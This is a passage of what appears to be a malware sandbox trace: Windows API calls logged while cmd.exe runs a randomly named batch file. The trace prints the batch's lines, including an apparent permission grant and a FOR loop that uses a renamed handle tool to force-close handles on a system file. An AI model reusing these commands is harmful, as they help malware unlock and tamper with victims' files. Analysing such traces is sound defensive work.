lpMem=0x75a120 | out: hHeap=0x740000) returned 1 [0248.012] GetEnvironmentStringsW () returned 0x758ac8* [0248.012] GetProcessHeap () returned 0x740000 [0248.012] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xb88) returned 0x759658 [0248.012] FreeEnvironmentStringsW (penv=0x758ac8) returned 1 [0248.012] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.012] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0248.012] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.012] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0248.013] _get_osfhandle (_FileHandle=0) returned 0x3 [0248.013] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0248.013] SetConsoleInputExeNameW () returned 0x1 [0248.013] GetConsoleOutputCP () returned 0x1b5 [0248.013] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0248.013] SetThreadUILanguage (LangId=0x0) returned 0x409 [0248.014] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3df354, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0248.015] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0248.015] _get_osfhandle (_FileHandle=3) returned 0x78 [0248.015] SetFilePointer (in: hFile=0x78, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0248.015] GetProcessHeap () returned 0x740000 [0248.015] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x756260 | out: hHeap=0x740000) returned 1 [0248.015] GetProcessHeap () returned 0x740000 [0248.015] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x756220 | out: hHeap=0x740000) returned 1 [0248.015] GetProcessHeap () returned 0x740000 [0248.015] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7561e0 | out: hHeap=0x740000) returned 1 [0248.015] GetProcessHeap () returned 0x740000 [0248.015] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x740db8 | out: hHeap=0x740000) returned 1 [0248.015] GetProcessHeap () returned 0x740000 [0248.015] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x756180 | out: hHeap=0x740000) returned 1 [0248.015] GetProcessHeap () returned 0x740000 [0248.015] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7555e8 | out: hHeap=0x740000) returned 1 [0248.015] GetProcessHeap () returned 0x740000 [0248.015] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x741240 | out: hHeap=0x740000) returned 1 [0248.016] _get_osfhandle (_FileHandle=3) returned 0x78 [0248.016] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0248.016] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3df338, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x3df338*=0xa3, lpOverlapped=0x0) returned 1 [0248.016] SetFilePointer (in: hFile=0x78, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0248.016] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=15, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="cd /d \"%~dp0\"\r\n\nUSERNAME%:F /C\r\n") returned 15 [0248.016] _get_osfhandle (_FileHandle=3) returned 0x78 [0248.016] GetFileType (hFile=0x78) returned 0x1 [0248.016] _get_osfhandle (_FileHandle=3) returned 0x78 [0248.016] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0248.017] GetProcessHeap () returned 0x740000 [0248.017] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x400a) returned 0x764ab0 [0248.017] GetProcessHeap () returned 0x740000 [0248.017] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x70) returned 0x741240 [0248.017] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", nBufferLength=0x208, lpBuffer=0x3deac8, lpFilePart=0x3deac0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFilePart=0x3deac0*="Ch81ANBE.bat") returned 0x32 [0248.017] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x3de7dc | out: lpFindFileData=0x3de7dc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4595f660, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x4595f660, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x756180 [0248.017] FindClose (in: hFindFile=0x756180 | out: hFindFile=0x756180) returned 1 [0248.017] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x3de7dc | out: lpFindFileData=0x3de7dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x45665ae0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x45665ae0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x756180 [0248.018] FindClose (in: hFindFile=0x756180 | out: hFindFile=0x756180) returned 1 [0248.018] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0248.018] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x3de7dc | out: lpFindFileData=0x3de7dc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x756180 [0248.018] FindClose (in: hFindFile=0x756180 | out: hFindFile=0x756180) returned 1 [0248.018] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFindFileData=0x3de7dc | out: lpFindFileData=0x3de7dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb0ce860, ftCreationTime.dwHighDateTime=0x1d68286, ftLastAccessTime.dwLowDateTime=0xfb0ce860, ftLastAccessTime.dwHighDateTime=0x1d68286, ftLastWriteTime.dwLowDateTime=0xfb0ce860, ftLastWriteTime.dwHighDateTime=0x1d68286, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ch81ANBE.bat", cAlternateFileName="")) returned 0x756180 [0248.018] FindClose (in: hFindFile=0x756180 | out: hFindFile=0x756180) returned 1 [0248.018] GetProcessHeap () returned 0x740000 [0248.018] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x56) returned 0x756180 [0248.018] GetProcessHeap () returned 0x740000 [0248.018] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x764ab0 | out: hHeap=0x740000) returned 1 [0248.020] _tell (_FileHandle=3) returned 78 [0248.020] _close (_FileHandle=3) returned 0 [0248.021] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3df10c | out: _Buffer="\r\n") returned 2 [0248.021] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.021] GetFileType (hFile=0x7) returned 0x2 [0248.021] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0248.021] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df0cc | out: lpMode=0x3df0cc) returned 1 [0248.021] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.021] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3df0f8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3df0f8*=0x2) returned 1 [0248.024] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0248.024] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0248.024] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x3df108 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0248.024] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x3df108 | out: _Buffer=">") returned 1 [0248.024] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.024] GetFileType (hFile=0x7) returned 0x2 [0248.025] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0248.025] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df0d0 | out: lpMode=0x3df0d0) returned 1 [0248.025] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.025] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x3df0fc, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x3df0fc*=0x26) returned 1 [0248.025] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.026] GetFileType (hFile=0x7) returned 0x2 [0248.026] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0248.026] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df354 | out: lpMode=0x3df354) returned 1 [0248.026] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.026] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x740dc0*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3df380, lpReserved=0x0 | out: lpBuffer=0x740dc0*, lpNumberOfCharsWritten=0x3df380*=0x2) returned 1 [0248.026] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3df38c | out: _Buffer=" /d \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\\" ") returned 45 [0248.027] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.027] GetFileType (hFile=0x7) returned 0x2 [0248.027] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0248.027] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df34c | out: lpMode=0x3df34c) returned 1 [0248.027] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.027] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2d, lpNumberOfCharsWritten=0x3df378, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3df378*=0x2d) returned 1 [0248.029] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3df3ac | out: _Buffer="\r\n") returned 2 [0248.029] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.029] GetFileType (hFile=0x7) returned 0x2 [0248.030] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0248.030] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df36c | out: lpMode=0x3df36c) returned 1 [0248.030] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.030] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3df398, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3df398*=0x2) returned 1 [0248.032] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0248.032] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0248.032] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0248.032] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0248.032] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0248.032] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0248.032] GetConsoleTitleW (in: lpConsoleTitle=0x3def1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0248.033] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0248.033] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0248.033] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3decd8, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x3decd0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x3decd0*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0248.034] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3dea74 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0248.035] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", nBufferLength=0x104, lpBuffer=0x3dea74, lpFilePart=0x3dea70 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpFilePart=0x3dea70*=0x0) returned 0x26 [0248.035] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0248.035] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x3de7f0 | out: lpFindFileData=0x3de7f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4595f660, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x4595f660, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x7564c0 [0248.035] FindClose (in: hFindFile=0x7564c0 | out: hFindFile=0x7564c0) returned 1 [0248.035] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x3de7f0 | out: lpFindFileData=0x3de7f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x45665ae0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x45665ae0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x7564c0 [0248.035] FindClose (in: hFindFile=0x7564c0 | out: hFindFile=0x7564c0) returned 1 [0248.035] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0248.035] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x3de7f0 | out: lpFindFileData=0x3de7f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x7564c0 [0248.035] FindClose (in: hFindFile=0x7564c0 | out: hFindFile=0x7564c0) returned 1 [0248.036] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0248.036] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0248.036] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0248.036] GetProcessHeap () returned 0x740000 [0248.036] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x759658 | out: hHeap=0x740000) returned 1 [0248.036] GetEnvironmentStringsW () returned 0x758ac8* [0248.036] GetProcessHeap () returned 0x740000 [0248.036] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xb88) returned 0x759658 [0248.036] FreeEnvironmentStringsW (penv=0x758ac8) returned 1 [0248.036] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0248.036] GetProcessHeap () returned 0x740000 [0248.036] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x756460 | out: hHeap=0x740000) returned 1 [0248.036] GetProcessHeap () returned 0x740000 [0248.036] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x756400 | out: hHeap=0x740000) returned 1 [0248.036] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.036] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0248.037] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.037] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0248.037] _get_osfhandle (_FileHandle=0) returned 0x3 [0248.037] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0248.037] SetConsoleInputExeNameW () returned 0x1 [0248.037] GetConsoleOutputCP () returned 0x1b5 [0248.038] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0248.038] SetThreadUILanguage (LangId=0x0) returned 0x409 [0248.038] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3df354, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0248.039] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0248.039] _get_osfhandle (_FileHandle=3) returned 0x78 [0248.039] SetFilePointer (in: hFile=0x78, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0248.039] GetProcessHeap () returned 0x740000 [0248.039] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x756390 | out: hHeap=0x740000) returned 1 [0248.039] GetProcessHeap () returned 0x740000 [0248.039] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x756320 | out: hHeap=0x740000) returned 1 [0248.039] GetProcessHeap () returned 0x740000 [0248.039] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7562b0 | out: hHeap=0x740000) returned 1 [0248.039] GetProcessHeap () returned 0x740000 [0248.039] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x756240 | out: hHeap=0x740000) returned 1 [0248.040] GetProcessHeap () returned 0x740000 [0248.040] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x740db8 | out: hHeap=0x740000) returned 1 [0248.040] GetProcessHeap () returned 0x740000 [0248.040] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7561e0 | out: hHeap=0x740000) returned 1 [0248.040] GetProcessHeap () returned 0x740000 [0248.040] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x756180 | out: hHeap=0x740000) returned 1 [0248.040] GetProcessHeap () returned 0x740000 [0248.040] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x741240 | out: hHeap=0x740000) returned 1 [0248.040] _get_osfhandle (_FileHandle=3) returned 0x78 [0248.040] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0248.040] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3df338, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x3df338*=0x94, lpOverlapped=0x0) returned 1 [0248.040] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=148, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="FOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`tdq963ii.exe -accepteula %FN% -nobanner`) DO (tdq963ii.exe -accepteula -c %%J -y -p %%I -nobanner)\r\n") returned 148 [0248.041] _get_osfhandle (_FileHandle=3) returned 0x78 [0248.041] GetFileType (hFile=0x78) returned 0x1 [0248.041] _get_osfhandle (_FileHandle=3) returned 0x78 [0248.041] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0248.041] GetProcessHeap () returned 0x740000 [0248.041] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x400a) returned 0x764ab0 [0248.041] GetProcessHeap () returned 0x740000 [0248.041] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x4008) returned 0x768ac8 [0248.042] GetProcessHeap () returned 0x740000 [0248.042] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xe) returned 0x740db8 [0248.042] GetEnvironmentVariableW (in: lpName="FN", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="\"MSPVWCTL.DLL.mui\"") returned 0x12 [0248.042] GetProcessHeap () returned 0x740000 [0248.042] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x740db8 | out: hHeap=0x740000) returned 1 [0248.042] GetProcessHeap () returned 0x740000 [0248.042] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x768ac8 | out: hHeap=0x740000) returned 1 [0248.042] GetProcessHeap () returned 0x740000 [0248.042] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x764ab0 | out: hHeap=0x740000) returned 1 [0248.050] _tell (_FileHandle=3) returned 226 [0248.050] _close (_FileHandle=3) returned 0 [0248.050] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3df10c | out: _Buffer="\r\n") returned 2 [0248.050] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.050] GetFileType (hFile=0x7) returned 0x2 [0248.143] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0248.143] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df0cc | out: lpMode=0x3df0cc) returned 1 [0248.144] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.144] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3df0f8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3df0f8*=0x2) returned 1 [0248.145] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0248.146] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0248.146] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x3df108 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0248.146] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x3df108 | out: _Buffer=">") returned 1 [0248.146] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.146] GetFileType (hFile=0x7) returned 0x2 [0248.146] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0248.146] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df0d0 | out: lpMode=0x3df0d0) returned 1 [0248.146] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.146] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x3df0fc, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x3df0fc*=0x26) returned 1 [0248.147] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0x3df38c | out: _Buffer="FOR") returned 3 [0248.147] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.147] GetFileType (hFile=0x7) returned 0x2 [0248.147] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0248.147] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df34c | out: lpMode=0x3df34c) returned 1 [0248.148] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.148] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x3df378, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3df378*=0x3) returned 1 [0248.148] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x3df38c | out: _Buffer=" /F") returned 3 [0248.148] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.148] GetFileType (hFile=0x7) returned 0x2 [0248.149] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0248.149] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df34c | out: lpMode=0x3df34c) returned 1 [0248.149] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.149] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x3df378, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3df378*=0x3) returned 1 [0248.149] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x3df38c | out: _Buffer=" \"UseBackQ Tokens=3,6 delims=: \"") returned 32 [0248.149] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.149] GetFileType (hFile=0x7) returned 0x2 [0248.150] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0248.150] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3df34c | out: lpMode=0x3df34c) returned 1 [0248.150] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.150] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0x3df378, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x3df378*=0x20) returned 1 [0248.150] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0x3df38c | out: _Buffer=" %I IN ") returned 7 [0248.150] _get_osfhandle (_FileHandle=1) returned 0x7 [0248.150] GetFileType (hFile=0x7) returned 0x2 [0248.151] GetStdHandle 